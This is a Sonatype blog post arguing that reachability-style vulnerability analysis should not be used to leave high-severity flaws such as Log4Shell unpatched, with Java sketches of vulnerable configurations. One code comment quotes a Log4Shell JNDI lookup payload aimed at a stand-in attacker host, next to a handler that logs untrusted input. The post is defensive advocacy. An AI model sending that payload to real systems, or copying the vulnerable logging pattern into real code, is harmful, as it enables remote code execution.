Ignoring Log4j and recommending that high-risk open source vulnerabilities be left in application code isn't just irresponsible – it's dangerous.
Mirroring the explosive growth of open source software, analysis of open source vulnerabilities continues to dominate headlines. However, in an alarming trend, many security vendors have begun citing statistics that downplay risk in order to promote their services, like the recent statistic that "96% of Log4j in use…was not vulnerable to the Log4Shell zero-day."
At first glance this seems like a great result – now you only have to worry about fixing 4% of your applications! However, once you understand how such vulnerability analyses are performed and how exploitability evolves over time, the idea of leaving known vulnerable libraries in your applications becomes very uncomfortable. In fact, recommending that high-severity open source vulnerabilities be left in application code is more than irresponsible: it's dangerous.
Open source vulnerability analysis
Most security problems in open source software require certain conditions to be met for an application to be vulnerable. It may be that an attacker must be able to get arbitrary data into a particular function argument, or that a particular class must be used. Sometimes the application needs to set up a library with a particular non-default configuration. "Vulnerability analysis" (also called "attackability analysis," "exploitability analysis," or "reachability analysis") involves analyzing whether the conditions for triggering a vulnerability exist in the target application. It typically relies on static analysis to compute an approximation of what the program will do at runtime. I've previously discussed both the value and the pitfalls of "attackability"-based prioritization.
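To make this concrete, here is a minimal, entirely hypothetical sketch: the library com.acme.parser and its DocumentParser API are invented for illustration. The point is that exploitability hinges on whether the conditions are met – the configuration and the data flow – not on the library merely appearing on the classpath.

```java
// Hypothetical example: "com.acme.parser" and DocumentParser are invented names.
// A vulnerability analysis looks for code shaped like loadUploadedReport(),
// where the conditions for triggering the flaw are actually met.
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;

import com.acme.parser.DocumentParser; // hypothetical vulnerable library

public class ReportLoader {

    // Conditions NOT met: the risky feature stays at its safe default and only
    // trusted local files are parsed, so analysis reports "not vulnerable."
    public void loadTrustedReport(Path localFile) throws Exception {
        new DocumentParser().parse(Files.newInputStream(localFile));
    }

    // Conditions met: a non-default option is enabled AND attacker-controlled
    // bytes reach the vulnerable method, so the application is exploitable.
    public void loadUploadedReport(InputStream untrustedUpload) throws Exception {
        DocumentParser parser = new DocumentParser();
        parser.setResolveExternalEntities(true); // particular non-default configuration
        parser.parse(untrustedUpload);           // arbitrary data from the attacker
    }
}
```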
It is this approximate nature of static analysis that carries risk. Vulnerability analysis can certainly be helpful for prioritizing work, but it should never be used as an excuse to ignore a high-severity vulnerability.
False positives and false negatives
Most questions in static analysis are undecidable – a technical term that means there is no way to always provide a correct yes-or-no answer. For vulnerability analysis, this means that there are cases where the analysis reports that an application is vulnerable, but it actually is not (a "false positive") and cases where the analysis says that everything is safe, but there is actually a vulnerability present (a "false negative"). This second type of issue – false negatives – is the biggest problem with vulnerability analysis, as it provides a false sense of security and can result in vulnerabilities lingering in your software.
In theory, analyses can be constructed that are sound – another technical term, meaning you can always trust a "not vulnerable" result. In practice, however, soundness comes with a high number of false positives, eroding the value of vulnerability analysis as a useful filtering mechanism. ShiftLeft has not published information on the soundness of its analysis, but the reported 96% reduction in vulnerabilities, plus the challenge of reasoning in a completely sound way about language features like reflection, makes it unlikely that the underlying vulnerability analysis is completely sound. This is in fact the common case in commercial static analysis: some false negatives are accepted in order to keep false positives down and ensure that results are clear and actionable. Because of this, any vulnerability analysis tool is likely to have at least some false negatives in real-world code.
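Reflection is a good example of why full soundness is so elusive. In the sketch below (the class and its inputs are hypothetical), the code that ultimately runs is chosen by strings that only exist at runtime, so a static call graph may never connect attacker input to the vulnerable library entry point – a textbook false negative:

```java
// Minimal sketch of a reflective call that a static reachability analysis can miss.
// PluginRunner and its inputs are hypothetical.
import java.lang.reflect.Method;

public class PluginRunner {

    public void run(String className, String methodName, String attackerData) throws Exception {
        // Which class and method are invoked is only known at runtime.
        Class<?> pluginClass = Class.forName(className);
        Object plugin = pluginClass.getDeclaredConstructor().newInstance();
        Method handler = pluginClass.getMethod(methodName, String.class);

        // If className/methodName resolve to a vulnerable library entry point,
        // attacker data reaches it, yet an analysis that cannot model this
        // lookup will report the application as "not vulnerable."
        handler.invoke(plugin, attackerData);
    }
}
```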
The problem with false negatives
As mentioned above, false negatives provide a false sense of security – they tell a user that there is no vulnerability present when in fact there is. A small false negative rate might be tolerable for low and possibly medium severity security issues. These issues often have restrictive conditions on their exploitability, such as requiring non-default configurations or requiring attackers to have authenticated access to the system. Or they may grant only limited attacker capabilities – for example, observation of sensitive timing information, or disclosure of log data that should be private but does not contain cryptographic secrets.
However, the extreme impact of high-severity CVEs – Log4Shell was assigned the highest possible CVSS score of 10.0 – means that these security issues should never be ignored. To see why, suppose the effective false-negative rate is 1% (far lower than the industry average). And suppose that, as a recent study found, 96% of repositories that use insecure versions of Log4j are reported "not vulnerable" by a vulnerability analysis. Then in an organization with 100 repositories, the probability that at least one of those repositories is vulnerable even though it was reported as secure is about 62%.
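To make the arithmetic explicit (assuming false negatives occur independently across repositories): 96 of the 100 repositories come back marked "not vulnerable," and each of those reports is wrong with probability 1%, so

P(at least one missed vulnerability) = 1 - (1 - 0.01)^96 = 1 - 0.99^96 ≈ 0.62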
With a vulnerability like Log4Shell, which is still being actively exploited and results in full attacker control, this is an unacceptable level of risk. And shifting to patched versions of Log4j is time well spent — CISA Director Jen Easterly recently stated that "We do expect Log4Shell to be used in intrusions well into the future."
Software evolves
Even if a tool did have a 0% false negative rate, the exploitability of a vulnerability evolves over time. Given more time with a library, security researchers and attackers often discover novel ways to exploit a vulnerability, which can make previously "secure" applications exploitable. Software also evolves, and applications that were not previously susceptible to a vulnerability can become vulnerable with a single small code change.
With the Log4Shell exploit, becoming vulnerable is as simple as adding a new log message that includes some user input, as the sketch below illustrates. Analysis tools in CI might detect this (assuming it doesn't fall into their "false negative space"), but that will block a software release and result in unplanned work for the team. It is much better to stay ahead of vulnerabilities by proactively upgrading dependencies, even if vulnerability analysis indicates that the application is not yet vulnerable. This proactive work can be scheduled, tracked, and adjusted to fit the development team's capacity. None of this is true for the unplanned work that results from ignoring insecure open source dependencies.
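For example, with a vulnerable Log4j 2 release (2.14.1 or earlier) still on the classpath, one added logging statement is enough to create the data flow Log4Shell needs. The handler and header below are illustrative:

```java
// Illustrative handler: with Log4j 2 <= 2.14.1 on the classpath, the second
// logging call gives an attacker the data flow Log4Shell requires.
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginHandler {

    private static final Logger LOGGER = LogManager.getLogger(LoginHandler.class);

    public void handleLogin(String username, String userAgentHeader) {
        // Before the change: only constant text is logged, so a reachability
        // analysis reports this application as "not vulnerable."
        LOGGER.info("login attempt received");

        // One small change during routine work: attacker-controlled input now
        // reaches the logger. A request whose User-Agent header is something
        // like "${jndi:ldap://attacker.example.com/a}" triggers the JNDI lookup.
        LOGGER.info("login attempt from user-agent {}", userAgentHeader);
    }
}
```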
The right way to use vulnerability analysis
Given that false negatives are prevalent in commercial static analysis tools, and that software and exploitability both evolve over time, vulnerability analysis should never be used to justify ignoring high-severity open source security issues. Ideally, vulnerability analysis should be paired with other risk assessment tools, such as an analysis of which applications are most business critical, which are most accessible to attackers, and which sit outside other layers of protection such as firewalls or VPNs.
When rolling out software composition analysis (SCA), an organization should address the highest-severity vulnerabilities first and prioritize applications that handle untrusted data and are exposed to the public Internet. But the best security programs also put a process in place to eventually address all high and medium severity issues, reaching a point where keeping dependencies up to date is an ongoing, planned part of the development process.
Sonatype Lifecycle helps make this achievable by providing low false positive rates – ensuring you have fewer results to work through – and carefully vetted remediation advice that speeds remediation by helping you make efficient upgrade choices.
Written by Stephen Magill
Stephen Magill is Vice President of Product Innovation at Sonatype. He's the former CEO of MuseDev, a software company acquired by Sonatype, and is dedicated to helping developers write their best code through code quality automation. Stephen is a world-recognized expert on program analysis and was previously a principal scientist at Galois. Among his other accomplishments, he earned his Ph.D. and M.S. in CS from Carnegie Mellon and serves on the University of Tulsa Industry Advisory Board.